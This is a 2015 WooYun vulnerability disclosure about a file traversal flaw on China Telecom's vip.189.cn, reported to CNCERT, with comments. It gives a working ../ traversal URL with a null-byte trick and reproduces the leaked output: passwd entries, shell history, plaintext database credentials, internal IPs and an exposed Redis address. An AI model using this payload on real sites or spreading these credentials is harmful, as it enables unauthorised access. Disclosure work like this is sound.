中国电信某业务可文件遍历(泄漏数据库配置,外网redis可连接)

编号91444
Urlhttp://www.wooyun.org/bug.php?action=view&id=91444
漏洞状态已交由第三方合作机构(cncert国家互联网应急中心)处理
漏洞标题中国电信某业务可文件遍历(泄漏数据库配置,外网redis可连接)
漏洞类型任意文件遍历/下载
厂商189.cn
白帽子lijiejie
提交日期2015-01-13 16:08:00
公开日期2015-02-27 16:10:00
修复时间(not set)
确认时间2015-01-18 00:00:00
Confirm Spend5
漏洞标签
关注数0
收藏数0
白帽评级
白帽自评rank10
厂商评级
厂商评rank17
漏洞简介
中国电信某站点可目录遍历,可读取较多敏感信息。
漏洞细节

目录遍历位于:

http://vip.189.cn/web/front/downloadFile?name=/../../../../../../../..//../../etc/passwd%00.docx


非root,但依然可以读取不少有用信息。

POC

首先读取passwd,找到3个用户,root暂不管,权限不够:

zh_readonly:x:620:620::/home/zh_readonly:/bin/bash
resin_order:x:622:622::/home/resin_order:/bin/bash
resin_mgr:x:625:625::/home/resin_mgr:/bin/bash


接着读取/home/resin_mgr/.bash_history,找到了

cd /data/jsp/
ls
ll
cd mgr.vip.189.cn/
ls
cd order_mgr/
ls
cd skin
ls
vim /data/jsp/mgr.vip.189.cn/order_mgr/skin/WEB-INF/classes/application.properties
/opt/resin_mgr/bin/resin.sh restart
tailf /opt/resin_mgr/log/jvm-default.log
mkdir -p /data/jsp/mgr.vip.189.cn/order_mgr/ssoUpload


读取数据库配置:

jdbc.driver=com.mysql.jdbc.Driver
jdbc.url=jdbc:mysql://172.16.150.89:3306/ordercenterNew2?useUnicode=true&characterEncoding=utf-8&autoReconnect=true&autoReconnectForPools=true
jdbc.username=ordercenter
jdbc.password=ordercenter123
redis.pool.maxActive=100
redis.pool.maxIdle=20
redis.pool.maxWait=1000
redis.pool.testOnBorrow=true
redis.hostname=172.16.150.184
redis.port=56379
redis.queue.maxSize=100000


看到redis绑定了56379端口,扫vip.189.cn/24这个C段,果然找到个可直接访问的redis:

118.123.170.219: 56379


189.cn.redis.png

修复方案

限制可下载的文件

状态信息 2015-01-13: 细节已通知厂商并且等待厂商处理中
2015-01-18: 厂商已经确认,细节仅向厂商公开
2015-01-28: 细节向核心白帽子及相关领域专家公开
2015-02-07: 细节向普通白帽子公开
2015-02-17: 细节向实习白帽子公开
2015-02-27: 细节向公众公开
厂商回复CNVD确认并复现所述情况,已经转由cncert向中国电信集团公司通报,由其后续协调网站管理单位处置。
回应信息危害等级:高漏洞Rank:17 确认时间:2015-01-18 11:49
Showing 1-5 of 5 items.
评论内容评论人点赞数评论时间

李姐姐给力

wefgod02015-01-21 16:27:00

很猛啊

小r00to102015-01-13 16:32:00

@猪猪侠 不到一半猪猪侠的rank,哈哈,猪猪侠威武...

lijiejie02015-01-13 16:30:00

redis好东西呀,

_Thorns02015-01-13 16:25:00

慢点

猪猪侠02015-01-13 16:10:00